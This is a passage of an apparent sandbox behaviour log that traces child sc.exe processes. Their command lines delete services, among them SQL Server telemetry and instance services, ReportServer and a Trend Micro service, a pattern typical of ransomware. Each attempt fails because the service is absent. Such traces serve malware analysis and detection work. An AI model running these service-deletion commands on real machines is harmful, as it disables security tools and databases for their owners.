"c:\\windows\\system32\\en-us\\sc.exe.mui") Thread: id = 71 os_tid = 0xd30 [0078.612] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff67ae30000 [0078.612] __set_app_type (_Type=0x1) [0078.612] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff67ae31f00) returned 0x0 [0078.612] __wgetmainargs (in: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038, _DoWildCard=0, _StartInfo=0x7ff67ae41044 | out: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038) returned 0 [0078.612] SetThreadUILanguage (LangId=0x0) returned 0x409 [0078.737] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0078.737] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0078.737] wcsncmp (_String1="de", _String2="\\\\", _MaxCount=0x2) returned 8 [0078.737] _wcsicmp (_String1="delete", _String2="query") returned -13 [0078.737] _wcsicmp (_String1="delete", _String2="queryex") returned -13 [0078.737] _wcsicmp (_String1="delete", _String2="start") returned -15 [0078.737] _wcsicmp (_String1="delete", _String2="pause") returned -12 [0078.737] _wcsicmp (_String1="delete", _String2="interrogate") returned -5 [0078.737] _wcsicmp (_String1="delete", _String2="control") returned 1 [0078.737] _wcsicmp (_String1="delete", _String2="continue") returned 1 [0078.737] _wcsicmp (_String1="delete", _String2="stop") returned -15 [0078.737] _wcsicmp (_String1="delete", _String2="config") returned 1 [0078.737] _wcsicmp (_String1="delete", _String2="description") returned -7 [0078.737] _wcsicmp (_String1="delete", _String2="failure") returned -2 [0078.737] _wcsicmp (_String1="delete", _String2="privs") returned -12 [0078.737] _wcsicmp (_String1="delete", _String2="failureflag") returned -2 [0078.737] _wcsicmp (_String1="delete", _String2="triggerinfo") returned -16 [0078.737] _wcsicmp (_String1="delete", _String2="sidtype") returned -15 [0078.737] _wcsicmp (_String1="delete", _String2="managedaccount") returned -9 [0078.737] _wcsicmp (_String1="delete", _String2="preferrednode") returned -12 [0078.738] _wcsicmp (_String1="delete", _String2="qc") returned -13 [0078.738] _wcsicmp (_String1="delete", _String2="qdescription") returned -13 [0078.738] _wcsicmp (_String1="delete", _String2="qfailure") returned -13 [0078.738] _wcsicmp (_String1="delete", _String2="qprivs") returned -13 [0078.738] _wcsicmp (_String1="delete", _String2="qfailureflag") returned -13 [0078.738] _wcsicmp (_String1="delete", _String2="qtriggerinfo") returned -13 [0078.738] _wcsicmp (_String1="delete", _String2="qsidtype") returned -13 [0078.738] _wcsicmp (_String1="delete", _String2="showsid") returned -15 [0078.738] _wcsicmp (_String1="delete", _String2="qpreferrednode") returned -13 [0078.738] _wcsicmp (_String1="delete", _String2="qmanagedaccount") returned -13 [0078.738] _wcsicmp (_String1="delete", _String2="querylock") returned -13 [0078.738] _wcsicmp (_String1="delete", _String2="qprotection") returned -13 [0078.738] _wcsicmp (_String1="delete", _String2="lock") returned -8 [0078.738] _wcsicmp (_String1="delete", _String2="delete") returned 0 [0078.738] ResolveDelayLoadedAPI () returned 0x7ffc02114740 [0078.739] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x2ab8468bc0 [0078.743] OpenServiceW (hSCManager=0x2ab8468bc0, lpServiceName="ReportServer", dwDesiredAccess=0x10000) returned 0x0 [0078.744] GetLastError () returned 0x424 [0078.744] _ultow (in: _Dest=0x424, _Radix=-1204946600 | out: _Dest=0x424) returned="1060" [0078.744] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x424, dwLanguageId=0x0, lpBuffer=0x7ff67ae41640, nSize=0x400, Arguments=0x0 | out: lpBuffer="The specified service does not exist as an installed service.\r\n") returned 0x3f [0078.745] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0x2ab82df910, nSize=0x2, Arguments=0x2ab82df940 | out: lpBuffer="頰롆*") returned 0x62 [0078.745] GetFileType (hFile=0x24) returned 0x2 [0078.745] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x2ab82df8c0 | out: lpMode=0x2ab82df8c0) returned 1 [0078.769] WriteConsoleW (in: hConsoleOutput=0x24, lpBuffer=0x2ab8469830*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0x2ab82df8b8, lpReserved=0x0 | out: lpBuffer=0x2ab8469830*, lpNumberOfCharsWritten=0x2ab82df8b8*=0x62) returned 1 [0078.769] LocalFree (hMem=0x2ab8469830) returned 0x0 [0078.769] LocalFree (hMem=0x0) returned 0x0 [0078.769] CloseServiceHandle (hSCObject=0x2ab8468bc0) returned 1 [0078.769] LocalFree (hMem=0x0) returned 0x0 [0078.769] exit (_Code=1060) Thread: id = 342 os_tid = 0x1310 Process: id = "44" image_name = "sc.exe" filename = "c:\\windows\\system32\\sc.exe" page_root = "0x76c18000" os_pid = "0xd34" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb14" cmd_line = "sc delete \"SQLTELEMETRY$HL\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1075 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1076 start_va = 0x77546f0000 end_va = 0x775470ffff entry_point = 0x0 region_type = private name = "private_0x00000077546f0000" filename = "" Region: id = 1077 start_va = 0x7754710000 end_va = 0x7754723fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000007754710000" filename = "" Region: id = 1078 start_va = 0x7754730000 end_va = 0x77547affff entry_point = 0x0 region_type = private name = "private_0x0000007754730000" filename = "" Region: id = 1079 start_va = 0x77547b0000 end_va = 0x77547b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000077547b0000" filename = "" Region: id = 1080 start_va = 0x77547c0000 end_va = 0x77547c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000077547c0000" filename = "" Region: id = 1081 start_va = 0x77547d0000 end_va = 0x77547d1fff entry_point = 0x0 region_type = private name = "private_0x00000077547d0000" filename = "" Region: id = 1082 start_va = 0x7df5ff440000 end_va = 0x7ff5ff43ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff440000" filename = "" Region: id = 1083 start_va = 0x7ff67a0f0000 end_va = 0x7ff67a112fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67a0f0000" filename = "" Region: id = 1084 start_va = 0x7ff67a11a000 end_va = 0x7ff67a11afff entry_point = 0x0 region_type = private name = "private_0x00007ff67a11a000" filename = "" Region: id = 1085 start_va = 0x7ff67a11e000 end_va = 0x7ff67a11ffff entry_point = 0x0 region_type = private name = "private_0x00007ff67a11e000" filename = "" Region: id = 1086 start_va = 0x7ff67ae30000 end_va = 0x7ff67ae45fff entry_point = 0x7ff67ae30000 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\System32\\sc.exe" (normalized: "c:\\windows\\system32\\sc.exe") Region: id = 1087 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1657 start_va = 0x7754860000 end_va = 0x775495ffff entry_point = 0x0 region_type = private name = "private_0x0000007754860000" filename = "" Region: id = 1658 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1659 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5658 start_va = 0x77546f0000 end_va = 0x77546fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000077546f0000" filename = "" Region: id = 5659 start_va = 0x7754700000 end_va = 0x7754706fff entry_point = 0x0 region_type = private name = "private_0x0000007754700000" filename = "" Region: id = 5660 start_va = 0x77547e0000 end_va = 0x775485ffff entry_point = 0x0 region_type = private name = "private_0x00000077547e0000" filename = "" Region: id = 5661 start_va = 0x7754960000 end_va = 0x7754a1dfff entry_point = 0x7754960000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5662 start_va = 0x7754b20000 end_va = 0x7754b2ffff entry_point = 0x0 region_type = private name = "private_0x0000007754b20000" filename = "" Region: id = 5663 start_va = 0x7ff679ff0000 end_va = 0x7ff67a0effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff679ff0000" filename = "" Region: id = 5664 start_va = 0x7ff67a11c000 end_va = 0x7ff67a11dfff entry_point = 0x0 region_type = private name = "private_0x00007ff67a11c000" filename = "" Region: id = 5665 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5666 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5681 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5682 start_va = 0x7754a20000 end_va = 0x7754a26fff entry_point = 0x0 region_type = private name = "private_0x0000007754a20000" filename = "" Region: id = 5683 start_va = 0x7754a30000 end_va = 0x7754b0efff entry_point = 0x7754a30000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 5684 start_va = 0x7754b30000 end_va = 0x7754b41fff entry_point = 0x7754b30000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\System32\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\sc.exe.mui") Thread: id = 72 os_tid = 0xd38 [0080.544] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff67ae30000 [0080.544] __set_app_type (_Type=0x1) [0080.544] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff67ae31f00) returned 0x0 [0080.544] __wgetmainargs (in: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038, _DoWildCard=0, _StartInfo=0x7ff67ae41044 | out: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038) returned 0 [0080.544] SetThreadUILanguage (LangId=0x0) returned 0x409 [0080.606] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0080.606] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0080.606] wcsncmp (_String1="de", _String2="\\\\", _MaxCount=0x2) returned 8 [0080.606] _wcsicmp (_String1="delete", _String2="query") returned -13 [0080.606] _wcsicmp (_String1="delete", _String2="queryex") returned -13 [0080.606] _wcsicmp (_String1="delete", _String2="start") returned -15 [0080.607] _wcsicmp (_String1="delete", _String2="pause") returned -12 [0080.607] _wcsicmp (_String1="delete", _String2="interrogate") returned -5 [0080.607] _wcsicmp (_String1="delete", _String2="control") returned 1 [0080.607] _wcsicmp (_String1="delete", _String2="continue") returned 1 [0080.607] _wcsicmp (_String1="delete", _String2="stop") returned -15 [0080.607] _wcsicmp (_String1="delete", _String2="config") returned 1 [0080.607] _wcsicmp (_String1="delete", _String2="description") returned -7 [0080.607] _wcsicmp (_String1="delete", _String2="failure") returned -2 [0080.607] _wcsicmp (_String1="delete", _String2="privs") returned -12 [0080.607] _wcsicmp (_String1="delete", _String2="failureflag") returned -2 [0080.607] _wcsicmp (_String1="delete", _String2="triggerinfo") returned -16 [0080.607] _wcsicmp (_String1="delete", _String2="sidtype") returned -15 [0080.607] _wcsicmp (_String1="delete", _String2="managedaccount") returned -9 [0080.607] _wcsicmp (_String1="delete", _String2="preferrednode") returned -12 [0080.607] _wcsicmp (_String1="delete", _String2="qc") returned -13 [0080.607] _wcsicmp (_String1="delete", _String2="qdescription") returned -13 [0080.607] _wcsicmp (_String1="delete", _String2="qfailure") returned -13 [0080.607] _wcsicmp (_String1="delete", _String2="qprivs") returned -13 [0080.607] _wcsicmp (_String1="delete", _String2="qfailureflag") returned -13 [0080.607] _wcsicmp (_String1="delete", _String2="qtriggerinfo") returned -13 [0080.607] _wcsicmp (_String1="delete", _String2="qsidtype") returned -13 [0080.607] _wcsicmp (_String1="delete", _String2="showsid") returned -15 [0080.607] _wcsicmp (_String1="delete", _String2="qpreferrednode") returned -13 [0080.607] _wcsicmp (_String1="delete", _String2="qmanagedaccount") returned -13 [0080.607] _wcsicmp (_String1="delete", _String2="querylock") returned -13 [0080.607] _wcsicmp (_String1="delete", _String2="qprotection") returned -13 [0080.607] _wcsicmp (_String1="delete", _String2="lock") returned -8 [0080.607] _wcsicmp (_String1="delete", _String2="delete") returned 0 [0080.607] ResolveDelayLoadedAPI () returned 0x7ffc02114740 [0080.609] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x7754868970 [0080.614] OpenServiceW (hSCManager=0x7754868970, lpServiceName="SQLTELEMETRY$HL", dwDesiredAccess=0x10000) returned 0x0 [0080.615] GetLastError () returned 0x424 [0080.615] _ultow (in: _Dest=0x424, _Radix=1417345544 | out: _Dest=0x424) returned="1060" [0080.615] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x424, dwLanguageId=0x0, lpBuffer=0x7ff67ae41640, nSize=0x400, Arguments=0x0 | out: lpBuffer="The specified service does not exist as an installed service.\r\n") returned 0x3f [0080.616] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0x77547af9c0, nSize=0x2, Arguments=0x77547af9f0 | out: lpBuffer="顐咆w") returned 0x62 [0080.617] GetFileType (hFile=0x24) returned 0x2 [0080.617] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x77547af970 | out: lpMode=0x77547af970) returned 1 [0080.658] WriteConsoleW (in: hConsoleOutput=0x24, lpBuffer=0x7754869850*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0x77547af968, lpReserved=0x0 | out: lpBuffer=0x7754869850*, lpNumberOfCharsWritten=0x77547af968*=0x62) returned 1 [0080.659] LocalFree (hMem=0x7754869850) returned 0x0 [0080.659] LocalFree (hMem=0x0) returned 0x0 [0080.659] CloseServiceHandle (hSCObject=0x7754868970) returned 1 [0080.659] LocalFree (hMem=0x0) returned 0x0 [0080.659] exit (_Code=1060) Thread: id = 365 os_tid = 0x1384 Process: id = "45" image_name = "sc.exe" filename = "c:\\windows\\system32\\sc.exe" page_root = "0xefdd000" os_pid = "0xd3c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb14" cmd_line = "sc delete \"TMBMServer\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1088 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1089 start_va = 0x77e8d20000 end_va = 0x77e8d3ffff entry_point = 0x0 region_type = private name = "private_0x00000077e8d20000" filename = "" Region: id = 1090 start_va = 0x77e8d40000 end_va = 0x77e8d53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000077e8d40000" filename = "" Region: id = 1091 start_va = 0x77e8d60000 end_va = 0x77e8ddffff entry_point = 0x0 region_type = private name = "private_0x00000077e8d60000" filename = "" Region: id = 1092 start_va = 0x77e8de0000 end_va = 0x77e8de3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000077e8de0000" filename = "" Region: id = 1093 start_va = 0x77e8df0000 end_va = 0x77e8df0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000077e8df0000" filename = "" Region: id = 1094 start_va = 0x77e8e00000 end_va = 0x77e8e01fff entry_point = 0x0 region_type = private name = "private_0x00000077e8e00000" filename = "" Region: id = 1095 start_va = 0x7df5ff100000 end_va = 0x7ff5ff0fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff100000" filename = "" Region: id = 1096 start_va = 0x7ff67a7e0000 end_va = 0x7ff67a802fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67a7e0000" filename = "" Region: id = 1097 start_va = 0x7ff67a804000 end_va = 0x7ff67a804fff entry_point = 0x0 region_type = private name = "private_0x00007ff67a804000" filename = "" Region: id = 1098 start_va = 0x7ff67a80e000 end_va = 0x7ff67a80ffff entry_point = 0x0 region_type = private name = "private_0x00007ff67a80e000" filename = "" Region: id = 1099 start_va = 0x7ff67ae30000 end_va = 0x7ff67ae45fff entry_point = 0x7ff67ae30000 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\System32\\sc.exe" (normalized: "c:\\windows\\system32\\sc.exe") Region: id = 1100 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1660 start_va = 0x77e8fb0000 end_va = 0x77e90affff entry_point = 0x0 region_type = private name = "private_0x00000077e8fb0000" filename = "" Region: id = 1661 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1662 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5035 start_va = 0x77e8d20000 end_va = 0x77e8d2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000077e8d20000" filename = "" Region: id = 5036 start_va = 0x77e8d30000 end_va = 0x77e8d36fff entry_point = 0x0 region_type = private name = "private_0x00000077e8d30000" filename = "" Region: id = 5037 start_va = 0x77e8e10000 end_va = 0x77e8ecdfff entry_point = 0x77e8e10000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5038 start_va = 0x77e8ed0000 end_va = 0x77e8f4ffff entry_point = 0x0 region_type = private name = "private_0x00000077e8ed0000" filename = "" Region: id = 5039 start_va = 0x77e9190000 end_va = 0x77e919ffff entry_point = 0x0 region_type = private name = "private_0x00000077e9190000" filename = "" Region: id = 5040 start_va = 0x7ff67a6e0000 end_va = 0x7ff67a7dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67a6e0000" filename = "" Region: id = 5041 start_va = 0x7ff67a80c000 end_va = 0x7ff67a80dfff entry_point = 0x0 region_type = private name = "private_0x00007ff67a80c000" filename = "" Region: id = 5042 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5043 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5044 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5045 start_va = 0x77e8f50000 end_va = 0x77e8f56fff entry_point = 0x0 region_type = private name = "private_0x00000077e8f50000" filename = "" Region: id = 5046 start_va = 0x77e90b0000 end_va = 0x77e918efff entry_point = 0x77e90b0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 5047 start_va = 0x77e8f60000 end_va = 0x77e8f71fff entry_point = 0x77e8f60000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\System32\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\sc.exe.mui") Thread: id = 73 os_tid = 0xd40 [0074.938] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff67ae30000 [0074.938] __set_app_type (_Type=0x1) [0074.938] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff67ae31f00) returned 0x0 [0074.939] __wgetmainargs (in: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038, _DoWildCard=0, _StartInfo=0x7ff67ae41044 | out: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038) returned 0 [0074.939] SetThreadUILanguage (LangId=0x0) returned 0x409 [0075.085] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0075.085] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0075.085] wcsncmp (_String1="de", _String2="\\\\", _MaxCount=0x2) returned 8 [0075.085] _wcsicmp (_String1="delete", _String2="query") returned -13 [0075.085] _wcsicmp (_String1="delete", _String2="queryex") returned -13 [0075.086] _wcsicmp (_String1="delete", _String2="start") returned -15 [0075.086] _wcsicmp (_String1="delete", _String2="pause") returned -12 [0075.086] _wcsicmp (_String1="delete", _String2="interrogate") returned -5 [0075.086] _wcsicmp (_String1="delete", _String2="control") returned 1 [0075.086] _wcsicmp (_String1="delete", _String2="continue") returned 1 [0075.086] _wcsicmp (_String1="delete", _String2="stop") returned -15 [0075.086] _wcsicmp (_String1="delete", _String2="config") returned 1 [0075.086] _wcsicmp (_String1="delete", _String2="description") returned -7 [0075.086] _wcsicmp (_String1="delete", _String2="failure") returned -2 [0075.086] _wcsicmp (_String1="delete", _String2="privs") returned -12 [0075.086] _wcsicmp (_String1="delete", _String2="failureflag") returned -2 [0075.086] _wcsicmp (_String1="delete", _String2="triggerinfo") returned -16 [0075.086] _wcsicmp (_String1="delete", _String2="sidtype") returned -15 [0075.086] _wcsicmp (_String1="delete", _String2="managedaccount") returned -9 [0075.086] _wcsicmp (_String1="delete", _String2="preferrednode") returned -12 [0075.086] _wcsicmp (_String1="delete", _String2="qc") returned -13 [0075.086] _wcsicmp (_String1="delete", _String2="qdescription") returned -13 [0075.086] _wcsicmp (_String1="delete", _String2="qfailure") returned -13 [0075.086] _wcsicmp (_String1="delete", _String2="qprivs") returned -13 [0075.086] _wcsicmp (_String1="delete", _String2="qfailureflag") returned -13 [0075.086] _wcsicmp (_String1="delete", _String2="qtriggerinfo") returned -13 [0075.086] _wcsicmp (_String1="delete", _String2="qsidtype") returned -13 [0075.086] _wcsicmp (_String1="delete", _String2="showsid") returned -15 [0075.086] _wcsicmp (_String1="delete", _String2="qpreferrednode") returned -13 [0075.086] _wcsicmp (_String1="delete", _String2="qmanagedaccount") returned -13 [0075.086] _wcsicmp (_String1="delete", _String2="querylock") returned -13 [0075.086] _wcsicmp (_String1="delete", _String2="qprotection") returned -13 [0075.086] _wcsicmp (_String1="delete", _String2="lock") returned -8 [0075.086] _wcsicmp (_String1="delete", _String2="delete") returned 0 [0075.086] ResolveDelayLoadedAPI () returned 0x7ffc02114740 [0075.088] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x77e8fb8d10 [0075.093] OpenServiceW (hSCManager=0x77e8fb8d10, lpServiceName="TMBMServer", dwDesiredAccess=0x10000) returned 0x0 [0075.094] GetLastError () returned 0x424 [0075.094] _ultow (in: _Dest=0x424, _Radix=-388106280 | out: _Dest=0x424) returned="1060" [0075.094] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x424, dwLanguageId=0x0, lpBuffer=0x7ff67ae41640, nSize=0x400, Arguments=0x0 | out: lpBuffer="The specified service does not exist as an installed service.\r\n") returned 0x3f [0075.095] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0x77e8ddf790, nSize=0x2, Arguments=0x77e8ddf7c0 | out: lpBuffer="鎰w") returned 0x62 [0075.096] GetFileType (hFile=0x24) returned 0x2 [0075.096] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x77e8ddf740 | out: lpMode=0x77e8ddf740) returned 1 [0075.151] WriteConsoleW (in: hConsoleOutput=0x24, lpBuffer=0x77e8fb93b0*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0x77e8ddf738, lpReserved=0x0 | out: lpBuffer=0x77e8fb93b0*, lpNumberOfCharsWritten=0x77e8ddf738*=0x62) returned 1 [0075.151] LocalFree (hMem=0x77e8fb93b0) returned 0x0 [0075.151] LocalFree (hMem=0x0) returned 0x0 [0075.151] CloseServiceHandle (hSCObject=0x77e8fb8d10) returned 1 [0075.152] LocalFree (hMem=0x0) returned 0x0 [0075.152] exit (_Code=1060) Thread: id = 322 os_tid = 0x1248 Process: id = "46" image_name = "sc.exe" filename = "c:\\windows\\system32\\sc.exe" page_root = "0x20962000" os_pid = "0xd44" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb14" cmd_line = "sc delete \"MSSQL$PROGID\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1101 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1102 start_va = 0x71f37f0000 end_va = 0x71f380ffff entry_point = 0x0 region_type = private name = "private_0x00000071f37f0000" filename = "" Region: id = 1103 start_va = 0x71f3810000 end_va = 0x71f3823fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000071f3810000" filename = "" Region: id = 1104 start_va = 0x71f3830000 end_va = 0x71f38affff entry_point = 0x0 region_type = private name = "private_0x00000071f3830000" filename = "" Region: id = 1105 start_va = 0x71f38b0000 end_va = 0x71f38b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000071f38b0000" filename = "" Region: id = 1106 start_va = 0x71f38c0000 end_va = 0x71f38c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000071f38c0000" filename = "" Region: id = 1107 start_va = 0x71f38d0000 end_va = 0x71f38d1fff entry_point = 0x0 region_type = private name = "private_0x00000071f38d0000" filename = "" Region: id = 1108 start_va = 0x7df5ff040000 end_va = 0x7ff5ff03ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff040000" filename = "" Region: id = 1109 start_va = 0x7ff67a7b0000 end_va = 0x7ff67a7d2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67a7b0000" filename = "" Region: id = 1110 start_va = 